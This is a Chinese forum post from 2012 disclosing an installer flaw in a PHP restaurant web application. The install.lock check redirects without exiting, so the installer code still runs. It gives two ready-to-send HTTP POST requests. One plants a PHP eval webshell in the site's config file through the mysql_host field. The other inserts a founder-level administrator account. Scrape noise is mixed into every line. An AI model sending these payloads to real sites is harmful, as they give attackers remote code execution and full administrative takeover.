问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。
" h2 v9 j, j( Y, W9 _
0 }0 ]9 { {2 X<?php2 D$ j! e7 G+ L8 g @
if(file_exists("../install.lock"))
" h% N( R k" i. I# Y7 |{
& L* V! t9 R# S& [) M header("Location: ../");//没有退出; q$ x% ?7 l7 s9 t
}
0 [, u3 X: J) X( d
y ^ D. D7 F$ o& _# e3 k! h//echo 'tst';exit;4 p7 _6 ]6 I& W0 ^
require_once("init.php");
Y0 j, w% } J G7 t2 kif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
5 z4 W6 v7 A! L V% G1 q{
2 K% ?* S7 w2 E) A- o可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
% u6 ~# u: `5 P9 e
- o) \/ _: Z; F1、getshell(很危险)
5 w/ s8 H& F" f, X( rif(empty($_REQUEST['step']) || $_REQUEST['step']==1); j. G! y( Q# A- D; m( N
{
# o9 \6 V( f* Z! p% s7 q" Z& h$smarty->assign("step",1);+ }5 o: K' h! z1 z1 t" i* F' |0 z
$smarty->display("index.html");
9 z6 U* R4 K a- ]4 z9 |" O}elseif($_REQUEST['step']==2)
Q0 f, O! H. m! y6 V{
% l3 \6 d: n2 Y" z6 ^5 q $mysql_host=trim($_POST['mysql_host']);5 [/ J% t8 q- R+ Z# f
$mysql_user=trim($_POST['mysql_user']);9 A$ F5 k) w4 a; N6 R
$mysql_pwd=trim($_POST['mysql_pwd']);
3 @6 m& f% I& b4 a $mysql_db=trim($_POST['mysql_db']);
' d7 W& X2 S! y; |/ ] $tblpre=trim($_POST['tblpre']);
9 {2 Q5 G+ X4 b: j3 {' E: ]4 P $domain==trim($_POST['domain']);% d+ w9 l: j* m ^/ w, i+ [# C7 Q
$str="<?php \r\n";
8 e, ?! k0 Y8 ? $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";
6 l' f4 k8 X. i: i $str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
/ i# ]. K( b# a5 ~. Z7 z $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";7 s, F; O# p1 h. N) n
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";9 o$ A: Z2 K# r$ ?
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
: N- w5 B; Z7 O; r $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
* f) G F3 [2 d, R; q $str.='define("DOMAIN","'.$domain.'");'."\r\n";/ D( {6 b, ~) A; h* q
$str.='define("SKINS","default");'."\r\n";
/ }( q" G6 C i& T! s $str.='?>';
% H. M; K2 |/ D& v: m5 Q4 k file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件" V8 E* T% K9 x. c, w. ?# t
上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马' T' l. L1 k* f' q5 b8 _
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
1 L, J5 R: N2 k( z6 x- zHost: 192.168.80.129$ E# A$ s/ T: B1 W
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0! N+ i* @2 \: {) ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
2 V# h0 \0 B# A0 O3 tAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.31 N2 z) s6 ]& C; R G6 h" F
Accept-Encoding: gzip, deflate
; {% m3 s" y: W; H, h, `0 GReferer: http://192.168.80.129/canting/install/index.php?step=1% a1 {6 h& R& N8 q1 b6 ]* Z8 v
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42" t3 F3 B: |. D; r' ~' L
Content-Type: application/x-www-form-urlencoded% `. ^9 s4 F/ }$ c: y% S
Content-Length: 126" L s: K- a7 z/ R. n
0 r) w3 a J8 n% c4 S8 x, Bmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD1 o/ ~' n' L3 v) T% \! M1 N
但是这个方法很危险,将导致网站无法运行。, K" D1 c1 y' Z. l7 O
6 D) O1 O6 o1 ?2 p4 p7 ]2、直接添加管理员2 S R& a6 [, B# D9 ]* w
% B* d5 G" _% j$ T7 R( zelseif($_REQUEST['step']==5)
3 ?, n3 o7 _/ n& k& U' ]{
# s) I5 X0 R' r+ c% V* j I if($_POST); a6 K; P% D) k: @
{ require_once("../config/config.inc.php");7 x& Y, m; j! l( N3 j
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
; v# W" n% x7 F. \ mysql_select_db(MYSQL_DB,$link);' [* m, ?2 S# p0 T4 V& `
mysql_query("SET NAMES ".MYSQL_CHARSET );6 A6 Q8 N' p7 z: c2 f' W8 T
mysql_query("SET sql_mode=''");
( m+ z, V+ n5 }' ]! b
, u1 `) p4 p2 {: v $adminname=trim($_POST['adminname']);
j# |. e, K& x $pwd1=trim($_POST['pwd1']);
5 p5 P' U* }+ G. @1 S0 k $pwd2=trim($_POST['pwd2']);! Y* h, V* b! P! Q% N4 S
if(empty($adminname))
+ X; @3 f6 c- S" J9 \/ O! l) C k {
; p! M. \# }: m0 M9 Z( S( m% C* X- m
: o) N8 e) S7 ]% j: m# x: E echo "<script>alert('管理员不能为空');history.go(-1);</script>";, O% k& `" V" W! M2 k+ c3 A
exit();
4 A8 K8 t7 n- S+ w3 e% O3 | }- w! S5 v1 F% u8 I. w
if(($pwd1!=$pwd2) or empty($pwd1)) J0 I' {" k8 s" v
{1 ]+ w# h( P5 e
echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出- w M/ U6 i1 x5 @/ M6 T
}$ {$ J, @4 ~4 d8 ~+ v. n
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员8 H; _. O$ H3 Q# h( l6 D: x; Q, w
}- ?* W& l" ^1 `6 M
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
! G& _# G! `( E; YPOST /canting/install/index.php?m=index&step=5 HTTP/1.1
+ H" j3 P9 b4 ?9 t. K/ X* J0 VHost: 192.168.80.129
$ d3 |5 g; J/ g5 d' Q9 HUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
" K/ ~+ m* H+ N2 a- pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8: O* {8 l5 @3 D6 s! P
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
* f# v+ _& k4 M" q7 V+ ]Accept-Encoding: gzip, deflate
3 U( h- b( U' i; B% F9 H9 zReferer: http://www.2cto.com /canting/install/index.php?step=12 g5 A+ e1 b4 B# T+ v
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42% X* |- @0 x1 S W. Z E; E
Content-Type: application/x-www-form-urlencoded
7 F- E8 L; O W+ T8 ?$ B, ~2 HContent-Length: 46* M0 {& n7 L) d& Y5 ?: M
* y- k7 S0 k3 A
adminname=qingshen&pwd1=qingshen&pwd2=qingshen1 a3 r9 r s$ U1 c
|
发表于 2012-12-4 11:13:44
收藏
支持
反对